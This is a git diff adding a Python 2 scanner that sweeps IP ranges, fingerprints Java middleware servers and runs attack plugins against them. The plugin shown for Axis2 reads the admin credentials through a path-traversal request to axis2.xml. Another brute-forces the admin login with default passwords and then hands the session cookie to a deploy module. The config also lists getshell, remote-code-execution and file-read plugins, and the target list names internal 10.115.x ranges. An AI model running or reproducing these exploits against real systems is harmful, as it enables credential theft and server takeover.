getcode2git
diff --git a/‎F-MiddlewareScan.py‎
Lines changed: 197 additions & 0 deletions b/‎F-MiddlewareScan.py‎
Lines changed: 197 additions & 0 deletions
diff --git a/‎discern_config.ini‎
Lines changed: 10 additions & 0 deletions b/‎discern_config.ini‎
Lines changed: 10 additions & 0 deletions
diff --git a/‎ip.ini‎
Lines changed: 2 additions & 0 deletions b/‎ip.ini‎
Lines changed: 2 additions & 0 deletions
diff --git a/‎plugin_config.ini‎
Lines changed: 6 additions & 0 deletions b/‎plugin_config.ini‎
Lines changed: 6 additions & 0 deletions
diff --git a/‎plugins/axis_config_read.py‎
Lines changed: 29 additions & 0 deletions b/‎plugins/axis_config_read.py‎
Lines changed: 29 additions & 0 deletions
diff --git a/‎plugins/axis_config_read.pyc‎
1.18 KB b/‎plugins/axis_config_read.pyc‎
1.18 KB
diff --git a/‎plugins/axis_crackpass.py‎
Lines changed: 38 additions & 0 deletions b/‎plugins/axis_crackpass.py‎
Lines changed: 38 additions & 0 deletions
diff --git a/‎plugins/axis_crackpass.pyc‎
1.61 KB b/‎plugins/axis_crackpass.pyc‎
1.61 KB
diff --git a/‎plugins/axis_deploy.py‎
Lines changed: 27 additions & 0 deletions b/‎plugins/axis_deploy.py‎
Lines changed: 27 additions & 0 deletions
diff --git a/‎plugins/axis_deploy.pyc‎
5.37 KB b/‎plugins/axis_deploy.pyc‎
5.37 KB
@@ -0,0 +1,197 @@
+#coding:utf-8
+#author:wolf@future-sec
+
+import getopt
+import sys
+import Queue
+import threading
+import socket
+import urllib2
+import time
+import os
+
+queue = Queue.Queue()
+sys.path.append("plugins")
+mutex = threading.Lock()
+timeout = 10
+class ThreadNum(threading.Thread):
+    def __init__(self,queue):
+        threading.Thread.__init__(self)
+        self.queue = queue
+    def run(self):
+        while True:
+            queue_task = self.queue.get()
+            task_type,task_host,task_port = queue_task.split(":")
+            if task_type == 'portscan':
+                port_status = scan_port(task_type,task_host,task_port)
+                if port_status == True:
+                    queue.put(":".join(['discern',task_host,task_port]))
+            elif task_type == 'discern':
+                discern_type = scan_discern(task_type,task_host,task_port)
+                if discern_type:
+                    queue.put(":".join([discern_type,task_host,task_port]))
+            else:
+                scan_vul(task_type,task_host,task_port)
+            self.queue.task_done()
+def scan_port(task_type,host,port):
+    try:
+        socket.setdefaulttimeout(timeout/2)
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.connect((str(host),int(port)))
+        log(task_type,host,port)
+        sock.close()
+        return True
+    except:
+        return False
+def log(scan_type,host,port,info=''):
+    mutex.acquire()
+    time_str = time.strftime('%X', time.localtime( time.time()))
+    if scan_type == 'portscan':
+        print "[%s] %s:%d open"%(time_str,host,int(port))
+    elif scan_type == 'discern':
+        print "[%s] http://%s:%d is %s"%(time_str,host,int(port),info)
+    else:
+        if info:
+            print "[*%s] %s"%(time_str,info)
+            log_file = open('result.log','a')
+            log_file.write("[*%s] %s\r\n"%(time_str,info))
+            log_file.close()
+        else:
+            print "[%s] http://%s:%s call plugin %s"%(time_str,host,port,scan_type)
+    mutex.release()
+def read_config(config_type):
+    if config_type == 'discern':
+        mark_list=[]
+        config_file = open('discern_config.ini','r')
+        for mark in config_file:
+            name,location,key,value = mark.strip().split("|")
+            mark_list.append([name,location,key,value])
+        config_file.close()
+        return mark_list
+    elif config_type == 'plugin':
+        plugin_list = {}
+        config_file = open('plugin_config.ini','r')
+        for plugin in config_file:
+            name,plugin_file_list = plugin.strip().split("|")
+            plugin_list[name]=[]
+            plugin_list[name] = plugin_file_list.split(",")
+        config_file.close()
+        return plugin_list
+        
+def scan_discern(scan_type,host,port):
+    mark_list = read_config('discern')
+    for mark_info in mark_list:
+        if mark_info[1] == 'header':
+            try:
+                header = urllib2.urlopen("http://%s:%d"%(host,int(port)),timeout=timeout).headers
+            except urllib2.HTTPError,e:
+                header = e.headers
+            except Exception,e:
+                return False
+            try:
+                if mark_info[3].lower() in header[mark_info[2]].lower():
+                    log(scan_type,host,port,mark_info[0])
+                    return mark_info[0]
+            except Exception,e:
+                continue
+        elif mark_info[1] == 'file':
+            try:
+                re_html = urllib2.urlopen("http://%s:%d/%s"%(host,int(port),mark_info[2]),timeout=timeout).read()
+            except urllib2.HTTPError,e:
+                re_html = e.read()
+            except Exception,e:
+                return False
+            if mark_info[3].lower() in re_html.lower():
+                log(scan_type,host,port,mark_info[0])
+                return mark_info[0]
+def scan_vul(scan_type,host,port):
+    vul_plugin = read_config("plugin")
+    try:
+        for plugin_name in vul_plugin[scan_type]:
+            req = __import__(plugin_name)
+            log(plugin_name,host,port)
+            vul_data = req.check(host,port,timeout)
+            if vul_data.split("|")[0].upper()=="YES":
+                log(scan_type,host,port,vul_data.split("|")[1])
+    except Exception,e:
+        pass
+def get_ip_list(ip):
+    ip_list = []
+    iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
+    numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
+    if '-' in ip:
+        ip_range = ip.split('-')
+        ip_start = long(iptonum(ip_range[0]))
+        ip_end = long(iptonum(ip_range[1]))
+        ip_count = ip_end - ip_start
+        if ip_count >= 0 and ip_count <= 65536:
+            for ip_num in range(ip_start,ip_end+1):
+                ip_list.append(numtoip(ip_num))
+        else:
+            print '-h wrong format'
+    elif '.ini' in ip:
+        ip_config = open(ip,'r')
+        for ip in ip_config:
+            ip_list.extend(get_ip_list(ip.strip()))
+        ip_config.close()
+    else:
+        ip_split=ip.split('.')
+        net = len(ip_split)
+        if net == 2:
+            for b in range(1,255):
+                for c in range(1,255):
+                    ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c)
+                    ip_list.append(ip)
+        elif net == 3:
+            for c in range(1,255):
+                ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c)
+                ip_list.append(ip)
+        elif net ==4:
+            ip_list.append(ip)
+        else:
+            print "-h wrong format"
+    return ip_list
+def put_queue(ip_list,port_list):
+    for ip in ip_list:
+        for port in port_list:
+            queue.put(":".join(['portscan',ip,port]))
+if __name__=="__main__":
+    msg = '''
+A vulnerability detection scripts for middleware services author:wolf@future-sec
+Usage: python F-MiddlewareScan.py -h 192.168.1 [-p 7001,8080] [-m 50] [-t 10]
+    '''
+    if len(sys.argv) < 2:
+        print msg
+    try:
+        options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:")
+        ip = ''
+        port = '80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080'
+        m_count = 100
+        for opt,arg in options:
+            if opt == '-h':
+                ip = arg
+            elif opt == '-p':
+                port = arg
+            elif opt == '-m':
+                m_count = int(arg)
+            elif opt == '-t':
+                timeout = int(arg)
+        if ip:
+            ip_list = get_ip_list(ip)
+            port_list = []
+            if '.ini' in port:
+                port_config = open(port,'r')
+                for port in port_config:
+                    port_list.append(port.strip())
+                port_config.close()
+            else:
+                port_list = port.split(',')
+            put_queue(ip_list,port_list)
+            for i in range(m_count):
+                t = ThreadNum(queue)
+                t.setDaemon(True)
+                t.start()
+            queue.join()
+    except Exception,e:
+        print msg
+
@@ -0,0 +1,10 @@
+jboss|header|X-Powered-By|jboss
+jboss|file|jboss.css|youcandoit.jpg
+jboss|file|is_test|JBossWeb
+axis|file|axis2|axis2-web/images/axis_l.jpg
+weblogic|file|is_test|Hypertext Transfer Protocol
+weblogic|file|console/css/login.css|Login_GC_LoginPage_Bg.gif
+glassfish|file|resource/js/cj.js|glassfish.dev.java.net
+glassfish|header|Server|GlassFish
+resin|header|server|resin
+tomcat|file|is_test|Apache Tomcat
@@ -0,0 +1,2 @@
+10.115.153
+10.115.145
@@ -0,0 +1,6 @@
+tomcat|tomcat_crackpass
+weblogic|weblogic_crackpass,weblogic_unrce
+jboss|jboss_crackpass,jboss_unrce,jboss_info,jboss_head_getshell
+axis|axis_crackpass,axis_config_read,axis_info
+glassfish|glassfish_crackpass,glassfish_fileread
+resin|resin_crackpass,resin_fileread,resin_fileread2,resin_fileread3,resin_fileread4
@@ -0,0 +1,29 @@
+#coding:utf-8
+#author:wolf@future-sec
+import re
+import urllib2
+def check(host,port,timeout):
+    try:
+        url = "http://%s:%d"%(host,int(port))
+        res = urllib2.urlopen(url+'/axis2/services/listServices',timeout=timeout)
+        res_code = res.code
+        res_html = res.read()
+        if int(res_code) == 404:
+            return 'NO'
+        m=re.search('\/axis2\/services\/(.*?)\?wsdl">.*?<\/a>',res_html)
+        if m.group(1):
+            server_str = m.group(1)
+            read_url = url+'/axis2/services/%s?xsd=../conf/axis2.xml'%(server_str)
+            res = urllib2.urlopen(read_url,timeout=timeout)
+            res_html = res.read()
+            if 'axisconfig' in res_html:
+                try:
+                    user=re.search('<parameter name="userName">(.*?)<\/parameter>',res_html)
+                    password=re.search('<parameter name="password">(.*?)<\/parameter>',res_html)
+                    info = '%s Local File Inclusion Vulnerability %s:%s'%(read_url,user.group(1),password.group(1))
+                except:
+                    pass
+                return 'YES|'+info
+    except Exception,e:
+        return 'NO'
+    return 'NO'
@@ -0,0 +1,38 @@
+#coding:utf-8
+#author:wolf@future-sec
+import urllib2
+def check(host,port,timeout):
+    url = "http://%s:%d"%(host,int(port))
+    error_i=0
+    flag_list=['Administration Page</title>','System Components','"axis2-admin/upload"','include page="footer.inc">','axis2-admin/logout']
+    user_list=['axis','admin','manager','root']
+    pass_list=['','axis','axis2','123456','12345678','password','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
+    for user in user_list:
+        for password in pass_list:
+            try:
+                login_url = url+'/axis2/axis2-admin/login'
+                PostStr='userName=%s&password=%s&submit=+Login+'%(user,password)
+                request = urllib2.Request(login_url,PostStr)
+                res = urllib2.urlopen(request,timeout=timeout)
+                res_html = res.read()
+            except urllib2.HTTPError,e:
+                return 'NO'
+            except urllib2.URLError,e:
+                error_i+=1
+                if error_i >= 3:
+                    return 'NO'
+                continue
+            for flag in flag_list:
+                if flag in res_html:
+                    info = '%s Axis Weak password %s:%s'%(login_url,user,password)
+                    try:
+                        login_cookie = res.headers['Set-Cookie']
+                        deploy = __import__("axis_deploy")
+                        re = deploy.run(host,port,timeout,login_cookie)
+                        if re:
+                            info += re
+                    except Exception,e:
+                        print e
+                        pass
+                    return 'YES|'+info
+    return 'NO'